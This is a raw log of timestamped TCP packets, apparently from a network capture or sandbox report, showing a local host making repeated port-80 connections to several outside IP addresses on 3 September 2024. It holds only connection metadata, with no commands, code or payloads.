                      Sep 3, 2024 12:46:24.248466015 CEST4973980192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:24.253427982 CEST8049739199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:24.253437996 CEST8049739199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:24.253500938 CEST8049739199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:24.253509998 CEST8049739199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:24.253541946 CEST8049739199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:24.253550053 CEST8049739199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:24.253557920 CEST8049739199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:24.253637075 CEST8049739199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:24.254528046 CEST8049739199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:24.686636925 CEST8049739199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:24.686778069 CEST8049739199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:24.686788082 CEST8049739199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:24.686827898 CEST4973980192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:25.756103039 CEST4973980192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:26.782568932 CEST4974180192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:26.787389994 CEST8049741199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:26.787467957 CEST4974180192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:26.794883966 CEST4974180192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:26.799745083 CEST8049741199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:27.237807989 CEST8049741199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:27.237822056 CEST8049741199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:27.238123894 CEST8049741199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:27.238157988 CEST4974180192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:27.238178015 CEST4974180192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:27.240897894 CEST4974180192.168.2.4199.59.243.226
                      Sep 3, 2024 12:46:27.245649099 CEST8049741199.59.243.226192.168.2.4
                      Sep 3, 2024 12:46:32.699393034 CEST4974280192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:32.704324007 CEST8049742154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:32.704458952 CEST4974280192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:32.717315912 CEST4974280192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:32.722150087 CEST8049742154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:33.583709955 CEST8049742154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:33.583734035 CEST8049742154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:33.583796978 CEST4974280192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:34.224879980 CEST4974280192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:35.244087934 CEST4974380192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:35.248948097 CEST8049743154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:35.249020100 CEST4974380192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:35.258577108 CEST4974380192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:35.263495922 CEST8049743154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:36.128294945 CEST8049743154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:36.128374100 CEST8049743154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:36.128432035 CEST4974380192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:36.771780968 CEST4974380192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:37.790643930 CEST4974480192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:37.795552969 CEST8049744154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:37.795655966 CEST4974480192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:37.806225061 CEST4974480192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:37.811248064 CEST8049744154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:37.811285973 CEST8049744154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:37.811294079 CEST8049744154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:37.811300993 CEST8049744154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:37.811332941 CEST8049744154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:37.811764002 CEST8049744154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:37.811772108 CEST8049744154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:37.812236071 CEST8049744154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:37.812243938 CEST8049744154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:38.881063938 CEST8049744154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:38.881514072 CEST8049744154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:38.881572962 CEST4974480192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:39.318547010 CEST4974480192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:40.336718082 CEST4974580192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:40.341698885 CEST8049745154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:40.341804028 CEST4974580192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:40.347528934 CEST4974580192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:40.352569103 CEST8049745154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:41.453099012 CEST8049745154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:41.453125000 CEST8049745154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:41.453133106 CEST8049745154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:41.453140974 CEST8049745154.23.184.240192.168.2.4
                      Sep 3, 2024 12:46:41.453242064 CEST4974580192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:41.453265905 CEST4974580192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:41.455884933 CEST4974580192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:41.455884933 CEST4974580192.168.2.4154.23.184.240
                      Sep 3, 2024 12:46:41.690156937 CEST8049745154.23.184.240192.168.2.4
                      Sep 3, 2024 12:47:00.027806997 CEST4975080192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:00.032828093 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.032890081 CEST4975080192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:00.048372030 CEST4975080192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:00.053245068 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.593050003 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.593072891 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.593085051 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.593096972 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.593115091 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.593126059 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.593137026 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.593148947 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.593339920 CEST4975080192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:00.593370914 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.593441010 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.597002029 CEST4975080192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:00.598174095 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.598186016 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.598197937 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.598206997 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.598222017 CEST4975080192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:00.598467112 CEST4975080192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:00.675333977 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.675347090 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.675358057 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.675369024 CEST8049750162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:00.675438881 CEST4975080192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:01.553236961 CEST4975080192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:02.581443071 CEST4975180192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:02.657713890 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:02.659024000 CEST4975180192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:02.671083927 CEST4975180192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:02.675870895 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:03.449151993 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:03.449193954 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:03.449209929 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:03.449220896 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:03.449233055 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:03.449238062 CEST4975180192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:03.449244022 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:03.449255943 CEST4975180192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:03.449258089 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:03.449278116 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:03.449284077 CEST4975180192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:03.449290037 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:03.449302912 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:03.449321032 CEST4975180192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:03.449340105 CEST4975180192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:03.449915886 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:03.456181049 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:03.456199884 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:03.456213951 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:03.456221104 CEST4975180192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:03.456258059 CEST4975180192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:03.456614017 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:03.456626892 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:03.456640959 CEST8049751162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:03.456680059 CEST4975180192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:03.456698895 CEST4975180192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:04.178015947 CEST4975180192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:05.198950052 CEST4975280192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:05.204056978 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.207823992 CEST4975280192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:05.219326019 CEST4975280192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:05.224314928 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.224370003 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.224379063 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.224387884 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.224395990 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.224433899 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.224452019 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.224462032 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.224468946 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.845719099 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.845751047 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.845762014 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.845778942 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.845788956 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.845802069 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.845809937 CEST4975280192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:05.845813990 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.845828056 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.845837116 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.845841885 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.845854044 CEST4975280192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:05.845879078 CEST4975280192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:05.850970030 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.851028919 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.851039886 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.851067066 CEST4975280192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:05.851358891 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.851396084 CEST4975280192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:05.931431055 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.931452990 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.931464911 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.931494951 CEST4975280192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:05.931576967 CEST8049752162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:05.931632996 CEST4975280192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:06.724952936 CEST4975280192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:07.744513988 CEST4975380192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:07.749450922 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:07.749521017 CEST4975380192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:07.757998943 CEST4975380192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:07.763108969 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:08.341888905 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:08.341905117 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:08.341914892 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:08.341924906 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:08.341936111 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:08.341979980 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:08.341991901 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:08.342001915 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:08.342011929 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:08.342021942 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:08.342039108 CEST4975380192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:08.342135906 CEST4975380192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:08.347678900 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:08.347690105 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:08.347696066 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:08.347922087 CEST4975380192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:08.425724030 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:08.425735950 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:08.425746918 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:08.425839901 CEST4975380192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:08.426048040 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:08.426167011 CEST4975380192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:08.428960085 CEST4975380192.168.2.4162.0.239.141
                      Sep 3, 2024 12:47:08.437560081 CEST8049753162.0.239.141192.168.2.4
                      Sep 3, 2024 12:47:13.662206888 CEST4975480192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:13.668267965 CEST8049754199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:13.668333054 CEST4975480192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:13.681910038 CEST4975480192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:13.686738968 CEST8049754199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:14.122888088 CEST8049754199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:14.122904062 CEST8049754199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:14.122916937 CEST8049754199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:14.122962952 CEST4975480192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:14.123146057 CEST4975480192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:15.194969893 CEST4975480192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:16.212701082 CEST4975580192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:16.217607021 CEST8049755199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:16.217696905 CEST4975580192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:16.228790045 CEST4975580192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:16.233731985 CEST8049755199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:16.668078899 CEST8049755199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:16.668102980 CEST8049755199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:16.668113947 CEST8049755199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:16.668339968 CEST4975580192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:17.740871906 CEST4975580192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:18.758735895 CEST4975680192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:18.765925884 CEST8049756199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:18.767246962 CEST4975680192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:18.779081106 CEST4975680192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:18.786333084 CEST8049756199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:18.786344051 CEST8049756199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:18.786417961 CEST8049756199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:18.786427021 CEST8049756199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:18.786434889 CEST8049756199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:18.788681030 CEST8049756199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:18.788690090 CEST8049756199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:18.788692951 CEST8049756199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:18.788702965 CEST8049756199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:19.220160961 CEST8049756199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:19.220181942 CEST8049756199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:19.220196009 CEST8049756199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:19.220268011 CEST4975680192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:19.220268011 CEST4975680192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:20.287472963 CEST4975680192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:21.312838078 CEST4975780192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:21.317774057 CEST8049757199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:21.317843914 CEST4975780192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:21.326735973 CEST4975780192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:21.331562996 CEST8049757199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:21.773591995 CEST8049757199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:21.773606062 CEST8049757199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:21.773613930 CEST8049757199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:21.773787022 CEST4975780192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:21.776633978 CEST4975780192.168.2.4199.59.243.226
                      Sep 3, 2024 12:47:21.784113884 CEST8049757199.59.243.226192.168.2.4
                      Sep 3, 2024 12:47:34.931385994 CEST4975880192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:34.938137054 CEST80497585.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:34.938215017 CEST4975880192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:34.948638916 CEST4975880192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:34.953476906 CEST80497585.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:36.459419966 CEST4975880192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:36.507452965 CEST80497585.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:37.479929924 CEST4975980192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:37.486644030 CEST80497595.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:37.486716032 CEST4975980192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:37.507653952 CEST4975980192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:37.512476921 CEST80497595.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:39.022061110 CEST4975980192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:39.071440935 CEST80497595.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.041568995 CEST4976080192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:40.047529936 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.047595024 CEST4976080192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:40.059210062 CEST4976080192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:40.069313049 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.069322109 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.069329977 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.069338083 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.069344997 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.069351912 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.069454908 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.069462061 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:40.069597960 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:41.568823099 CEST4976080192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:41.615436077 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:42.589085102 CEST4976180192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:42.594105959 CEST80497615.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:42.597184896 CEST4976180192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:42.604516029 CEST4976180192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:42.609335899 CEST80497615.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:44.466851950 CEST80497585.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:44.469188929 CEST4975880192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:46.990346909 CEST80497595.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:46.991182089 CEST4975980192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:49.555859089 CEST80497605.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:49.555933952 CEST4976080192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:52.345927954 CEST80497615.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:52.345973969 CEST80497615.144.130.52192.168.2.4
                      Sep 3, 2024 12:47:52.346115112 CEST4976180192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:52.377109051 CEST4976180192.168.2.45.144.130.52
                      Sep 3, 2024 12:47:52.382015944 CEST80497615.144.130.52192.168.2.4
                      Sep 3, 2024 12:48:05.516267061 CEST4976280192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:05.521173000 CEST8049762161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:05.521260023 CEST4976280192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:05.540270090 CEST4976280192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:05.545099974 CEST8049762161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:06.104298115 CEST8049762161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:06.104311943 CEST8049762161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:06.104367971 CEST4976280192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:06.104393959 CEST8049762161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:06.104440928 CEST4976280192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:07.056333065 CEST4976280192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:08.073643923 CEST4976380192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:08.078519106 CEST8049763161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:08.078583002 CEST4976380192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:08.091609955 CEST4976380192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:08.096427917 CEST8049763161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:08.668709040 CEST8049763161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:08.668730021 CEST8049763161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:08.668741941 CEST8049763161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:08.668880939 CEST4976380192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:09.601846933 CEST4976380192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:10.619203091 CEST4976480192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:10.823477983 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:10.823652029 CEST4976480192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:10.834806919 CEST4976480192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:10.839740992 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:10.839751005 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:10.839773893 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:10.839884996 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:10.839893103 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:10.839900017 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:10.839907885 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:10.839915991 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:10.839929104 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:11.402501106 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:11.402761936 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:11.402820110 CEST4976480192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:11.677735090 CEST8049764161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:11.677788973 CEST4976480192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:12.350225925 CEST4976480192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:13.369194031 CEST4976580192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:13.374124050 CEST8049765161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:13.377382994 CEST4976580192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:13.384850979 CEST4976580192.168.2.4161.97.168.245
                      Sep 3, 2024 12:48:13.389842033 CEST8049765161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:13.979079008 CEST8049765161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:13.979094982 CEST8049765161.97.168.245192.168.2.4
                      Sep 3, 2024 12:48:13.979116917 CEST8049765161.97.168.245192.168.2.4
